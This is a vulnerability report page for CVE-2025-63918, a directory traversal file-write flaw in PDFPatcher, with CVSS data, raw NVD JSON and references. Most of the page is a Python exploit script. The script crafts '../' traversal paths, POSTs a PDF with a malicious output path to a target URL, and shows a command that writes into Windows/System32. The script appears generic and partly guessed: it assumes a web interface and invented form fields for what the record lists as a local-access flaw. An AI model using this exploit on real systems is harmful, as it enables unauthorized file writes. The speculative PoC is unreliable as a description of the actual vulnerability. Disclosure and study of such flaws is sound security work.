Security Vulnerability Report
中文
CVE-2025-63918 CVSS 6.2 MEDIUM

CVE-2025-63918

Published: 2025-11-17 17:15:51
Last Modified: 2026-01-08 17:18:52
Source: [email protected]

Description

PDFPatcher executable does not validate user-supplied file paths, allowing directory traversal attacks allowing attackers to upload arbitrary files to arbitrary locations.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:cnblogs:pdfpatcher:*:*:*:*:*:*:*:* - VULNERABLE
PDFPatcher < 修复版本
所有未及时更新安全补丁的PDFPatcher版本均受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-63918 PoC - PDFPatcher Directory Traversal File Write This PoC demonstrates how an attacker can exploit the directory traversal vulnerability in PDFPatcher to write files to arbitrary locations. """ import os import sys import requests from urllib.parse import quote def generate_malicious_pdf(): """Generate a minimal malicious PDF for exploitation""" return b'%PDF-1.4\n1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj\n' def create_traversal_payload(target_path, filename): """ Create a directory traversal payload to write files outside intended directory Args: target_path: The absolute path where we want to write the file filename: The name of the file to create Returns: Traversal path string that bypasses path validation """ # Calculate how many ../ we need based on the expected base directory # Adjust the number of ../ based on actual application behavior base_depth = 3 # Example: application expects files in ./output/ traversal = '../' * base_depth # Construct the full malicious path malicious_path = f"{traversal}{target_path}/{filename}" return malicious_path def exploit_pdfpatcher(target_url, output_path, filename): """ Exploit the directory traversal vulnerability Args: target_url: URL of the vulnerable PDFPatcher instance output_path: Target directory path (e.g., /tmp, /var/www) filename: Filename to write """ payload_path = create_traversal_payload(output_path, filename) malicious_pdf = generate_malicious_pdf() # Prepare the exploit request files = { 'file': ('malicious.pdf', malicious_pdf, 'application/pdf') } data = { 'action': 'export_image', 'output_path': payload_path, # Malicious traversal path 'format': 'png' } print(f"[*] Target: {target_url}") print(f"[*] Payload path: {payload_path}") print(f"[*] Attempting to write: {output_path}/{filename}") try: response = requests.post(target_url, files=files, data=data, timeout=30) if response.status_code == 200: print(f"[+] File write successful!") print(f"[+] Check {output_path}/{filename}") return True else: print(f"[-] Exploitation failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def local_exploit(): """ Local exploitation scenario - when attacker has local access """ print("[*] Local exploitation scenario") print("[*] Attacker can manipulate file paths via command line or GUI") # Example: PDFPatcher command line usage cmd = """ # Normal usage (intended): PDFPatcher.exe -export-images input.pdf -o ./output/ # Exploitation (malicious): PDFPatcher.exe -export-images input.pdf -o ../../../../Windows/System32/ # This writes files to System32 directory instead of intended output folder """ print(cmd) if __name__ == "__main__": print("=" * 60) print("CVE-2025-63918 - PDFPatcher Directory Traversal PoC") print("=" * 60) # Local exploitation example local_exploit() # Remote exploitation (if web interface exists) if len(sys.argv) > 1: target = sys.argv[1] exploit_pdfpatcher(target, "C:\\Windows\\Temp", "evil.txt")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63918", "sourceIdentifier": "[email protected]", "published": "2025-11-17T17:15:51.333", "lastModified": "2026-01-08T17:18:51.550", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PDFPatcher executable does not validate user-supplied file paths, allowing directory traversal attacks allowing attackers to upload arbitrary files to arbitrary locations."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cnblogs:pdfpatcher:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.3.4663", "matchCriteriaId": "36646C19-FE15-43AE-9E5F-68AAFA228774"}]}]}], "references": [{"url": "https://github.com/cydtseng/Vulnerability-Research/blob/main/pdfpatcher/DirectoryTraversal-ImageExport.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/wmjordan/PDFPatcher", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.cnblogs.com/pdfpatcher", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.